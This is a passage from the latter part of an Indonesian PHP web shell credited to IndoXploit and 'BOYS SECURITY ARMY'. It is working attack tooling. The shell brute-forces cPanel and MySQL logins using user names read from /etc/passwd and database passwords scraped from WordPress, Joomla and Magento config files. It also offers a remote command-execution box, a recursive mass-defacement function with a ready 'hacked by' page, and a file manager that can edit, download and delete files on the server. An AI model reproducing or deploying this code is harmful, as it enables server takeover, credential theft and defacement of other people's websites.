4150. +------------------------------------------------------------------------------------------------------------+</font></p>
4151. </form>";
4152.  
4153. }
4154. elseif($_GET['do'] == 'cpc') {
4155. echo "<center>";
4156. echo "<ul>";
4157. echo "<li> <a href='?dir=$dir&do=cpc'>cPanel Bruteforce</a> </li>";
4158. echo "<li> <a href='?dir=$dir&do=ftpb'>FTP Bruteforce</a> </li>";
4159. echo "<li> <a href='?dir=$dir&do=hunt'>.my.cnf Finder</a> </li>";
4160. echo "</ul>";
4161. echo "</center>";
4162. if($_POST['crack']) {
4163. $usercp = explode("\r\n", $_POST['user_cp']);
4164. $passcp = explode("\r\n", $_POST['pass_cp']);
4165. $i = 0;
4166. foreach($usercp as $ucp) {
4167. foreach($passcp as $pcp) {
4168. if(@mysql_connect('localhost', $ucp, $pcp)) {
4169. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
4170. } else {
4171. $_SESSION[$ucp] = "1";
4172. $_SESSION[$pcp] = "1";
4173. if($ucp == '' || $pcp == '') {
4174.  
4175. } else {
4176. $i++;
4177. if(function_exists('posix_getpwuid')) {
4178. $domain_cp = file_get_contents("/etc/named.conf");
4179. if($domain_cp == '') {
4180. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
4181. } else {
4182. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
4183. foreach($domains_cp[1] as $dj) {
4184. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
4185. $user_cp_url = $user_cp_url['name'];
4186. if($user_cp_url == $ucp) {
4187. $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
4188. break;
4189. }
4190. }
4191. }
4192. } else {
4193. $dom = "<font color=red>function is Disable by system</font>";
4194. }
4195. echo "<font color=lime>$ucp</font> | <font color=lime>$pcp</font> | http://$dom:2082<br>";
4196. }
4197. }
4198. }
4199. }
4200. }
4201. if($i == 0) {
4202. } else {
4203. echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
4204. }
4205. } else {
4206. echo "<center>
4207. <p align='center' dir='ltr'><font face='Tahoma' size='4'>[#] cPanel Brute Force [#]</font></p>
4208. <form method='post'>
4209. <textarea style='width: 450px; height: 150px;' name='user_cp' placeholder='User List'>";
4210. $_usercp = fopen("/etc/passwd","r");
4211. while($getu = fgets($_usercp)) {
4212. if($getu == '' || !$_usercp) {
4213. echo "<font color=red>Can't read /etc/passwd</font>";
4214. } else {
4215. preg_match_all("/(.*?):x:/", $getu, $u);
4216. foreach($u[1] as $user_cp) {
4217. if(is_dir("/home/$user_cp/public_html")) {
4218. echo "$user_cp\n";
4219. }
4220. }
4221. }
4222. }
4223. echo "</textarea>
4224. <textarea style='width: 450px; height: 150px;' name='pass_cp' placeholder='Password list'>";
4225. function cp_pass($dir) {
4226. $pass = "";
4227. $dira = scandir($dir);
4228. foreach($dira as $dirb) {
4229. if(!is_file("$dir/$dirb")) continue;
4230. $ambil = file_get_contents("$dir/$dirb");
4231. if(preg_match("/WordPress/", $ambil)) {
4232. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
4233. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
4234. $pass .= ambilkata($ambil,"password = '","'")."\n";
4235. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
4236. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
4237. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
4238. $pass .= ambilkata($ambil,'password = "','"')."\n";
4239. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
4240. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
4241. } elseif(preg_match("/^[client]$/", $ambil)) {
4242. preg_match("/password=(.*?)/", $ambil, $pass1);
4243. if(preg_match('/"/', $pass1[1])) {
4244. $pass1[1] = str_replace('"', "", $pass1[1]);
4245. $pass .= $pass1[1]."\n";
4246. } else {
4247. $pass .= $pass1[1]."\n";
4248. }
4249. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
4250. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
4251. }
4252. }
4253. echo $pass;
4254. }
4255. $cp_pass = cp_pass($dir);
4256. echo $cp_pass;
4257. echo "</textarea><br>
4258. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
4259. </form>
4260. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
4261. }
4262. }
4263. elseif($_GET['do'] == 'cmd') {
4264. echo "<form method='post'>
4265. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
4266. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
4267. </form>";
4268. if($_POST['do_cmd']) {
4269. echo "<pre>".exe($_POST['cmd'])."</pre>";
4270. }
4271. }
4272. elseif($_GET['do'] == 'mass_deface') {
4273. function sabun_massal($dir,$namafile,$isi_script) {
4274. if(is_writable($dir)) {
4275. $dira = scandir($dir);
4276. foreach($dira as $dirb) {
4277. $dirc = "$dir/$dirb";
4278. $lokasi = $dirc.'/'.$namafile;
4279. if($dirb === '.') {
4280. file_put_contents($lokasi, $isi_script);
4281. } elseif($dirb === '..') {
4282. file_put_contents($lokasi, $isi_script);
4283. } else {
4284. if(is_dir($dirc)) {
4285. if(is_writable($dirc)) {
4286. echo "[<font color=lime>DONE</font>] $lokasi<br>";
4287. file_put_contents($lokasi, $isi_script);
4288. $idx = sabun_massal($dirc,$namafile,$isi_script);
4289. }
4290. }
4291. }
4292. }
4293. }
4294. }
4295. function sabun_biasa($dir,$namafile,$isi_script) {
4296. if(is_writable($dir)) {
4297. $dira = scandir($dir);
4298. foreach($dira as $dirb) {
4299. $dirc = "$dir/$dirb";
4300. $lokasi = $dirc.'/'.$namafile;
4301. if($dirb === '.') {
4302. file_put_contents($lokasi, $isi_script);
4303. } elseif($dirb === '..') {
4304. file_put_contents($lokasi, $isi_script);
4305. } else {
4306. if(is_dir($dirc)) {
4307. if(is_writable($dirc)) {
4308. echo "<center><font color=red>DONE</font> -><font color=red>$dirb/$namafile</font></center>";
4309. file_put_contents($lokasi, $isi_script);
4310. }
4311. }
4312. }
4313. }
4314. }
4315. }
4316. function sabun_domen($dir,$namafile,$isi_script) {
4317. if(is_writable($dir)) {
4318. $dira = scandir($dir);
4319. foreach($dira as $dirb) {
4320. $dirc = "$dir/$dirb";
4321. $lokasi = $dirc.'/'.$namafile;
4322. if($dirb === '.') {
4323. file_put_contents($lokasi, $isi_script);
4324. } elseif($dirb === '..') {
4325. file_put_contents($lokasi, $isi_script);
4326. } else {
4327. if(is_dir($dirc)) {
4328. if(is_writable($dirc)) {
4329. echo "<center><a href='http://$dirb/$namafile' target='_blank'><font color=red>http://$dirb/$namafile</font></a></center>";
4330. file_put_contents($lokasi, $isi_script);
4331. }
4332. }
4333. }
4334. }
4335. }
4336. }
4337. if($_POST['start']) {
4338. if($_POST['tipe_sabun'] == 'mahal') {
4339. echo "<div style='margin: 5px auto; padding: 5px'>";
4340. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
4341. echo "</div>";
4342. } elseif($_POST['tipe_sabun'] == 'murah') {
4343. echo "<div style='margin: 5px auto; padding: 5px'>";
4344. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
4345. echo "</div>";
4346. }elseif($_POST['tipe_sabun'] == 'diskon') {
4347. echo "<div style='margin: 5px auto; padding: 5px'>";
4348. sabun_domen($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
4349. echo "</div>";
4350. }
4351. } else {
4352. echo "<center>";
4353. echo "<form method='post'>
4354. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
4355. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<input type='radio' name='tipe_sabun' value='diskon'>domain<br>
4356. <font style='text-decoration: underline;'>Folder:</font><br>
4357. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
4358. <font style='text-decoration: underline;'>Filename:</font><br>
4359. <input type='text' name='d_file' value='asu.htm' style='width: 450px;' height='10'><br>
4360. <font style='text-decoration: underline;'>Index File:</font><br>
4361. <textarea name='script' style='width: 450px; height: 200px;'><style>
4362. body {
4363. background-repeat:no-repeat;
4364. background-attachment:fixed;
4365. background-image:url(https://scontent.xx.fbcdn.net/v/t1.0-9/16806977_1822047768055543_1379597830503128744_n.jpg?oh=359c6d0c3403665fd989433a9e817f29&oe=595F5C32);
4366. background-size:cover;
4367. }
4368. </style>
4369. <title>hacked by Jingklong</title>
4370. <meta content='galo mhanx :(' name='description'/>
4371. <meta content='hacked by Jingklong, bahari trouble maker' name='keywords'/>
4372. <meta content='hacked by Jingklong, bahari trouble maker' name='Abstract'/>
4373. <center>
4374. <pre><strong>
4375. <font size='5'><span style='color:red;'><br><br><br><br>
4376.  
4377. Aku bukan orang yang memegang hatimu, aku bukan yang ada dalam mimpimu, dan..
4378. Aku bukan orang yang selalu di pikiranmu, aku bukan subjek status fbmu.
4379. Bukan aku alasan mengapa kau tertawa dan mengapa kau menumpahkan air mata.
4380.  
4381. Aku bukan yang yang cari, aku bukan orang yang kau inginkan.
4382. Sedih untuk mengatakan aku bukan tujuanmu, aku hanya sebuah persinggahan.. di tengah perjalananmu.
4383. Aku hanya sekedar orang lain yang tidak sengaja kau temui.
4384. Karena aku bukan orang yang kau cintai, aku bukan yang anda butuhkan.
4385.  
4386. Aku bukan pilihanmu.
4387. ------------------
4388. Jingklong
4389.  
4390. .gr33tz
4391. $ <marquee style='width:390px;font-family:Courier;font-size:14px;color:red;'>Maniak k4Sur ~ Tanpa Bicara ~ Virusa w0rm ~ M2404 - Angel dot ID ~ Kefiex404 ~ ELRO-BN404 - Zombie-Root ~ Malaikat Galau - cTzEn - VinderError - KapalJetz666 | BAHARI TROUBLE MAKER - INDONESIAN DEFACER NEWBIE - INDONESIA DEFACER TERSAKITI</marquee> $
4392. </strong></font></pre>
4393. <iframe width='0%' height='0' src='http://www.smule.com/recording/flanella-kwk_riza-flanella-tiga-hari-yang-lalu-guitar/657107202_748590997' frameborder='0'></iframe></textarea><br>
4394. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
4395. </form></center>";
4396. }
4397. }
4398. elseif($_GET['act'] == 'newfile') {
4399. if($_POST['new_save_file']) {
4400. $newfile = htmlspecialchars($_POST['newfile']);
4401. $fopen = fopen($newfile, "a+");
4402. if($fopen) {
4403. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
4404. } else {
4405. $act = "<font color=red>permission denied</font>";
4406. }
4407. }
4408. echo $act;
4409. echo "<form method='post'>
4410. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
4411. <input type='submit' name='new_save_file' value='Submit'>
4412. </form>";
4413. } elseif($_GET['act'] == 'newfolder') {
4414. if($_POST['new_save_folder']) {
4415. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
4416. if(!mkdir($new_folder)) {
4417. $act = "<font color=red>permission denied</font>";
4418. } else {
4419. $act = "<script>window.location='?dir=".$dir."';</script>";
4420. }
4421. }
4422. echo $act;
4423. echo "<form method='post'>
4424. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
4425. <input type='submit' name='new_save_folder' value='Submit'>
4426. </form>";
4427. } elseif($_GET['act'] == 'rename_dir') {
4428. if($_POST['dir_rename']) {
4429. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
4430. if($dir_rename) {
4431. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
4432. } else {
4433. $act = "<font color=red>permission denied</font>";
4434. }
4435. echo "".$act."<br>";
4436. }
4437. echo "<form method='post'>
4438. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
4439. <input type='submit' name='dir_rename' value='rename'>
4440. </form>";
4441. } elseif($_GET['act'] == 'delete_dir') {
4442. if(is_dir($dir)) {
4443. if(is_writable($dir)) {
4444. @rmdir($dir);
4445. @exe("rm -rf $dir");
4446. @exe("rmdir /s /q $dir");
4447. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
4448. } else {
4449. $act = "<font color=red>could not remove ".basename($dir)."</font>";
4450. }
4451. }
4452. echo $act;
4453. } elseif($_GET['act'] == 'view') {
4454. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> <br>";
4455. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
4456. } elseif($_GET['act'] == 'edit') {
4457. if($_POST['save']) {
4458. $save = file_put_contents($_GET['file'], $_POST['src']);
4459. if($save) {
4460. $act = "<font color=lime>Saved!</font>";
4461. } else {
4462. $act = "<font color=red>permission denied</font>";
4463. }
4464. echo "".$act."<br>";
4465. }
4466. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> <br>";
4467. echo "<form method='post'>
4468. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
4469. <input type='submit' value='Save' name='save' style='width: 500px;'>
4470. </form>";
4471. } elseif($_GET['act'] == 'rename') {
4472. if($_POST['do_rename']) {
4473. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
4474. if($rename) {
4475. $act = "<script>window.location='?dir=".$dir."';</script>";
4476. } else {
4477. $act = "<font color=red>permission denied</font>";
4478. }
4479. echo "".$act."<br>";
4480. }
4481. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> <br>";
4482. echo "<form method='post'>
4483. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
4484. <input type='submit' name='do_rename' value='rename'>
4485. </form>";
4486. } elseif($_GET['act'] == 'delete') {
4487. $delete = unlink($_GET['file']);
4488. if($delete) {
4489. $act = "<script>window.location='?dir=".$dir."';</script>";
4490. } else {
4491. $act = "<font color=red>permission denied</font>";
4492. }
4493. echo $act;
4494. } else {
4495. if(is_dir($dir) === true) {
4496. if(!is_readable($dir)) {
4497. echo "<font color=red>can't open directory. ( not readable )</font>";
4498. } else {
4499. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
4500. <tr>
4501. <th class="th_home"><center>Name</center></th>
4502. <th class="th_home"><center>Type</center></th>
4503. <th class="th_home"><center>Size</center></th>
4504. <th class="th_home"><center>Last Modified</center></th>
4505. <th class="th_home"><center>Owner/Group</center></th>
4506. <th class="th_home"><center>Permission</center></th>
4507. <th class="th_home"><center>Action</center></th>
4508. </tr>';
4509. $scandir = scandir($dir);
4510. foreach($scandir as $dirx) {
4511. $dtype = filetype("$dir/$dirx");
4512. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
4513. if(function_exists('posix_getpwuid')) {
4514. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
4515. $downer = $downer['name'];
4516. } else {
4517. //$downer = $uid;
4518. $downer = fileowner("$dir/$dirx");
4519. }
4520. if(function_exists('posix_getgrgid')) {
4521. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
4522. $dgrp = $dgrp['name'];
4523. } else {
4524. $dgrp = filegroup("$dir/$dirx");
4525. }
4526. if(!is_dir("$dir/$dirx")) continue;
4527. if($dirx === '..') {
4528. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
4529. } elseif($dirx === '.') {
4530. $href = "<a href='?dir=$dir'>$dirx</a>";
4531. } else {
4532. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
4533. }
4534. if($dirx === '.' || $dirx === '..') {
4535. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
4536. } else {
4537. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
4538. }
4539. echo "<tr>";
4540. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
4541. echo "<td class='td_home'><center>$dtype</center></td>";
4542. echo "<td class='td_home'><center>-</center></th></td>";
4543. echo "<td class='td_home'><center>$dtime</center></td>";
4544. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
4545. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
4546. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
4547. echo "</tr>";
4548. }
4549. }
4550. } else {
4551. echo "<font color=red>can't open directory.</font>";
4552. }
4553. foreach($scandir as $file) {
4554. $ftype = filetype("$dir/$file");
4555. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
4556. $size = filesize("$dir/$file")/1024;
4557. $size = round($size,3);
4558. if(function_exists('posix_getpwuid')) {
4559. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
4560. $fowner = $fowner['name'];
4561. } else {
4562. //$downer = $uid;
4563. $fowner = fileowner("$dir/$file");
4564. }
4565. if(function_exists('posix_getgrgid')) {
4566. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
4567. $fgrp = $fgrp['name'];
4568. } else {
4569. $fgrp = filegroup("$dir/$file");
4570. }
4571. if($size > 1024) {
4572. $size = round($size/1024,2). 'MB';
4573. } else {
4574. $size = $size. 'KB';
4575. }
4576. if(!is_file("$dir/$file")) continue;
4577. echo "<tr>";
4578. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
4579. echo "<td class='td_home'><center>$ftype</center></td>";
4580. echo "<td class='td_home'><center>$size</center></td>";
4581. echo "<td class='td_home'><center>$ftime</center></td>";
4582. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
4583. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
4584. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
4585.  
4586. echo "</tr>";
4587. }
4588. echo "</table>";
4589. if(!is_readable($dir)) {
4590. //
4591. } else {
4592. echo"<br>";
4593. }
4594. }
4595. ?>
4596. <audio src="https://soundcloud.com/electronic-circuit/via-valen-sayang-remix-by-rayocta303-dj-x-zr" controls></audio>
4597. <link href='http://fonts.googleapis.com/css?family=Give+You+Glory' rel='stylesheet' type='text/css'>
4598. </center><br></span><footer id="ftr" style="position:fixed; left:0px; right:0px; bottom:0px; background:transparent); text-align:right;">
4599. <font color="lime" size="2" face="Give You Glory">&copy; BOYS SECURITY ARMY Shell 2017</font></footer>
4600. </html>